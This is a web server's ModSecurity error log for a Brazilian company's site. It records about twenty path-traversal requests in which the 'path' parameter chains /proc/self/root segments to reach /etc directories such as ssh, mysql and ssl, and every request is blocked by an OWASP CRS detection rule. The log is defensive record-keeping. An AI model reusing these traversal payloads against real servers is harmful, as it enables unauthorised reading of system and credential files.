https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:36:43.620736 2026] [:error] [pid 10772:tid 140411624429312] [client 74.7.243.203:36640] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhby_9ocpUE4ed4uDwE7gAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:36:46.035591 2026] [:error] [pid 10651:tid 140411741927168] [client 74.7.243.203:36652] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbzrysWC90G-1nBrBWVgAAAYA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:36:47.379060 2026] [:error] [pid 15568:tid 140411590858496] [client 74.7.243.203:36664] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbz6QpVkWug9HeOt9IgQAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:36:48.791129 2026] [:error] [pid 10651:tid 140411708356352] [client 74.7.243.203:36676] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhb0LysWC90G-1nBrBWWAAAAYQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:36:52.563108 2026] [:error] [pid 15061:tid 140411683178240] [client 74.7.243.203:36686] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhb1KTCbgAP5jq5Teg_HQAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:36:53.881368 2026] [:error] [pid 15568:tid 140411624429312] [client 74.7.243.203:33102] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhb1aQpVkWug9HeOt9IgwAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:36:55.079967 2026] [:error] [pid 10831:tid 140411548894976] [client 74.7.243.203:33118] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhb146lpbStxTqkSkt9YQAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:36:57.429461 2026] [:error] [pid 10772:tid 140411666392832] [client 74.7.243.203:33128] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhb2f9ocpUE4ed4uDwE9wAAAgk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:37:04.412659 2026] [:error] [pid 15568:tid 140411733534464] [client 74.7.243.203:33142] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhb4KQpVkWug9HeOt9IjAAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:37:05.728039 2026] [:error] [pid 10831:tid 140411590858496] [client 74.7.243.203:40142] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhb4Y6lpbStxTqkSkt9ZwAAAlI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:37:08.279484 2026] [:error] [pid 10772:tid 140411624429312] [client 74.7.243.203:40146] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhb5P9ocpUE4ed4uDwFAwAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:37:13.871490 2026] [:error] [pid 10772:tid 140411666392832] [client 74.7.243.203:58774] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhb6f9ocpUE4ed4uDwFCgAAAgk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:37:18.508255 2026] [:error] [pid 29802:tid 140411557287680] [client 74.7.243.203:58776] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhb7s_BxrYCr4hPDw_9UwAAAdY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:37:33.873462 2026] [:error] [pid 15061:tid 140411616036608] [client 74.7.241.46:49744] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhb_aTCbgAP5jq5Teg_YgAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/var/run/initramfs/state/etc
[Mon Mar 16 16:37:37.354500 2026] [:error] [pid 10831:tid 140411624429312] [client 74.7.241.46:49668] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhcAY6lpbStxTqkSkt9dAAAAk4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:38:05.817696 2026] [:error] [pid 10772:tid 140411599251200] [client 74.7.243.203:58790] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhcHf9ocpUE4ed4uDwFVwAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:38:11.853850 2026] [:error] [pid 10831:tid 140411683178240] [client 74.7.243.203:55424] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhcI46lpbStxTqkSkt9fQAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:38:13.173157 2026] [:error] [pid 15061:tid 140411691570944] [client 74.7.243.203:40356] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhcJaTCbgAP5jq5Teg_dwAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:38:16.574329 2026] [:error] [pid 15568:tid 140411716749056] [client 74.7.243.203:40358] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhcKKQpVkWug9HeOt9IlwAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:38:19.283472 2026] [:error] [pid 14895:tid 140411699963648] [client 74.7.241.46:51926] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhcK1ajLEzk2WiQ-10mDAAAAoU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:38:22.739869 2026] [:error] [pid 29802:tid 140411708356352] [client 74.7.241.46:52406] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhcLs_BxrYCr4hPDw_9bwAAAcQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
